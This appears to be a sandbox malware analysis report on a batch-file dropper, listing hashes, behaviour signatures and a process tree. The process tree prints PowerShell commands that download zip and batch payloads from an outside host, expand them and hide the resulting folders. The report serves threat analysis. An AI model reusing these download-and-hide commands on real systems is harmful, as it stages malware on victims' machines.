Overview

overview

10

Static

static

1

02102024_0159_new.bat

windows7-x64

8

02102024_0159_new.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    122s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    02-10-2024 01:59

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    02102024_0159_new.bat

  • Size

    17.0MB

  • MD5

    3a6a863c82f5ad5ff271a7c740c1ab88

  • SHA1

    a85966b120a257211a5f2a245ac94244d5a77019

  • SHA256

    bc8ad4687d5b06fbcd16b1a119b0cec10b8063ff0154dcacc6e3e30a5ce9f2ba

  • SHA512

    79f8309de480b45d21520f18180ade1367217955e8e6e50b1251b28921bd8a5f2382382c21a5ef556282fb37dabb7337425a3bd658d10f8d417c5b21e022e10d

  • SSDEEP

    768:U6MPI1xfXAU2HVp93Cs5MJVBIkCm6M2EHC5w+wLfm6/95h65uvh3E1cQAAaBq3If:U145

Score
8/10
execution

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Powershell Invoke Web Request.

    execution
  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs
    evasion

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\02102024_0159_new.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2328
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://trackmyshipmng.site:9006/DXJS.zip' -OutFile 'C:\Users\Admin\Downloads\DXJS.zip' }"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2228
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "& { Expand-Archive -Path 'C:\Users\Admin\Downloads\DXJS.zip' -DestinationPath 'C:\Users\Admin\Downloads' -Force }"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1596
    • C:\Windows\system32\timeout.exe
      timeout /t 5 REM Wait for extraction to finish (adjust timeout as needed)
      2⤵
      • Delays execution with timeout.exe
      PID:2736
    • C:\Windows\system32\attrib.exe
      attrib +h "C:\Users\Admin\Downloads\Python"
      2⤵
      • Views/modifies file attributes
      PID:2768
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://trackmyshipmng.site:9006/startupppp.bat' -OutFile 'C:\Users\Admin\Downloads\startupppp.bat' }"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2784
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://trackmyshipmng.site:9006/FTSP.zip' -OutFile 'C:\Users\Admin\Downloads\FTSP.zip' }"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2080
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "& { Expand-Archive -Path 'C:\Users\Admin\Downloads\FTSP.zip' -DestinationPath 'C:\Users\Admin\Downloads' -Force }"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2952
    • C:\Windows\system32\attrib.exe
      attrib +h "C:\Users\Admin\Downloads\Print"
      2⤵
      • Views/modifies file attributes
      PID:2632

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    3d93be3762fdae0c03d225a921618c19

    SHA1

    b2e972b17c184550a61ff7bd2101126b0b7bfdc2

    SHA256

    0992bd22ee28dc52633d4f47a168dd271779b4303c6da7c7ea5b88cf6952cef6

    SHA512

    b3c41b03699ee737d07484bb92528d162cf6b94ee81df02b249d66920b4bac7332a27ae723a11957d357a16f346d6e7d0312bc785aaf2fa91d626680aa405451

    Download Submit

  • memory/1596-17-0x000000001B6A0000-0x000000001B982000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/1596-18-0x0000000001D80000-0x0000000001D88000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2228-4-0x000007FEF64CE000-0x000007FEF64CF000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2228-5-0x000000001B710000-0x000000001B9F2000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2228-7-0x000007FEF6210000-0x000007FEF6BAD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2228-6-0x0000000002240000-0x0000000002248000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2228-8-0x000007FEF6210000-0x000007FEF6BAD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2228-9-0x000007FEF6210000-0x000007FEF6BAD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2228-11-0x000007FEF6210000-0x000007FEF6BAD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2228-10-0x000000000227B000-0x00000000022E2000-memory.dmp

    Filesize

    412KB

    Download